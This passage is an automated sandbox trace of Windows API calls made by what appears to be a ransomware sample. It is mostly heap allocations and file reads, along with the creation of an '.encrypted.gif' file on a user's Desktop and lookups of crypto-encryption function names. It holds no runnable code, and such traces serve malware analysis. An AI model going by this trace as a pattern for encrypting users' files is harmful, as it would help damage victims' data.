lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0031.913] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.913] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1e8 [0031.913] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b85a8 [0031.913] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0031.913] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b85a8 | out: hHeap=0x770000) returned 1 [0031.913] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0031.913] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0031.913] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2100 [0031.913] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.913] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2100 | out: hHeap=0x770000) returned 1 [0031.913] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.913] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1e8 [0031.913] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1760 [0031.913] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0031.913] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0031.913] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0031.913] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0031.913] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0031.913] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0031.913] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1a8 [0031.913] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0031.914] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0031.914] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0031.914] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0031.914] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0031.914] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0031.914] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0031.914] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1a8 [0031.914] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c820 [0031.914] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0031.914] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0031.914] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0031.914] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0031.914] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0031.914] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0031.914] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3f8 [0031.914] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0031.914] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0031.914] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0031.914] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb0) returned 0x7c5758 [0031.914] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0031.914] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x70) returned 0x7db378 [0031.914] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0031.914] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x70) returned 0x7db300 [0031.914] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5758 | out: hHeap=0x770000) returned 1 [0031.914] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0031.914] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0031.914] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3f8 | out: hHeap=0x770000) returned 1 [0031.914] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0031.914] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0031.914] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7db378 | out: hHeap=0x770000) returned 1 [0031.914] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0031.914] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c820 | out: hHeap=0x770000) returned 1 [0031.914] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0031.914] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0031.914] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5c40 [0031.915] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tpm9533uyxhl8c6vtf")) returned 0x10 [0031.915] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5c40 | out: hHeap=0x770000) returned 1 [0031.915] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0031.915] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7db300 | out: hHeap=0x770000) returned 1 [0031.915] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0031.915] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0031.915] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0031.915] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2100 [0031.915] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0x935008 [0031.916] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0031.916] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0031.916] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\v6hoz9YcOP.encrypted.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tpm9533uyxhl8c6vtf\\v6hoz9ycop.encrypted.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0031.916] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18c8 [0031.916] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c820 [0031.916] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1a8 [0031.916] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0031.916] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0031.916] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0031.916] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1760 | out: hHeap=0x770000) returned 1 [0031.916] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0031.916] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.916] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1e8 [0031.916] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b85a8 [0031.916] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0031.916] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b85a8 | out: hHeap=0x770000) returned 1 [0031.916] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0031.916] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0031.916] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2280 [0031.916] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.916] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2280 | out: hHeap=0x770000) returned 1 [0031.916] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.916] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2280 [0031.916] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.917] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1e8 [0031.917] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1760 [0031.917] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0031.917] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0031.917] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0031.917] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0031.917] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0031.917] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0031.917] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0031.917] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0031.917] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0031.917] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0031.917] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0031.917] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0031.917] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0031.917] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x100000) returned 0x1090020 [0031.917] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae990 | out: lpNewFilePointer=0x0) returned 1 [0031.917] ReadFile (in: hFile=0x128, lpBuffer=0x88ffb0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x88ffb0*, lpNumberOfBytesRead=0x6ae9b8*=0x10000, lpOverlapped=0x0) returned 1 [0031.920] ReadFile (in: hFile=0x128, lpBuffer=0x88ffb0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x88ffb0*, lpNumberOfBytesRead=0x6ae9b8*=0x73c2, lpOverlapped=0x0) returned 1 [0031.921] ReadFile (in: hFile=0x128, lpBuffer=0x88ffb0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x88ffb0*, lpNumberOfBytesRead=0x6ae9b8*=0x0, lpOverlapped=0x0) returned 1 [0031.921] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0031.921] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0031.921] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0031.921] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0031.921] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x173c2) returned 0x945010 [0031.922] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x1090020 | out: hHeap=0x770000) returned 1 [0031.922] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0031.922] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0031.922] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1760 | out: hHeap=0x770000) returned 1 [0031.922] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0031.922] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1e8 [0031.922] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x173c2) returned 0x95c3e0 [0031.923] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x945010 | out: hHeap=0x770000) returned 1 [0031.923] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0031.924] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.924] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0031.924] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1760 [0031.924] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0031.924] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0031.924] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0031.924] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x173c2) returned 0x945010 [0031.924] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0031.924] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x945010 | out: hHeap=0x770000) returned 1 [0031.924] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0031.924] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0031.924] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1760 | out: hHeap=0x770000) returned 1 [0031.924] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0031.924] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.924] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0031.924] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0031.924] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0031.924] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0031.924] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0031.924] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0031.924] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c22c0 [0031.924] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.924] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0031.924] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0031.924] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0031.924] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0031.924] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.924] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0031.925] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1760 [0031.925] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da1c8 [0031.925] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1800 [0031.925] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0031.925] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0031.925] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3f8 [0031.925] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x173c2) returned 0x945010 [0031.925] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0031.925] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da2a8 [0031.925] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0031.925] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1f8 [0031.925] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0031.925] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da1f8 [0031.925] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0031.925] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da148 [0031.925] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0031.925] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da148 [0031.925] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0031.925] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da218 [0031.925] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da218 | out: hHeap=0x770000) returned 1 [0031.925] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cbc8 [0031.925] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1738 [0031.925] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0031.925] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da218 [0031.925] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0031.925] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da368 [0031.925] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x173c2) returned 0x89ffb8 [0031.927] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a58 [0031.927] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0031.927] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0031.927] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0031.927] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a30 [0031.927] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0031.927] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b20 [0031.927] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0031.927] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3e8 [0031.927] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0031.927] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18a0 [0031.927] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0031.927] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3a8 [0031.927] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c970 [0031.927] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0031.927] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.927] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2e8 [0031.927] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0031.927] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2e8 [0031.927] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0031.927] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2300 [0031.927] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.927] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c10 [0031.927] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0031.927] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0031.927] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0031.927] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1670 [0031.927] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0031.928] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0031.928] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2b8 [0031.928] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0031.928] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da358 [0031.928] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0031.928] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0031.928] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0031.928] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da358 | out: hHeap=0x770000) returned 1 [0031.928] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1968 [0031.928] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da358 [0031.928] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b48 [0031.928] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0031.928] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0031.928] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0031.928] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cb38 [0031.928] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1cd8 [0031.928] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0031.928] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da348 [0031.928] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0031.928] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1bc0 [0031.928] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0031.928] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0031.928] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0031.928] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1ad0 [0031.928] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0031.928] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0031.928] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0031.928] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0031.928] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0031.928] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0031.928] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19b8 [0031.928] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0031.928] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, 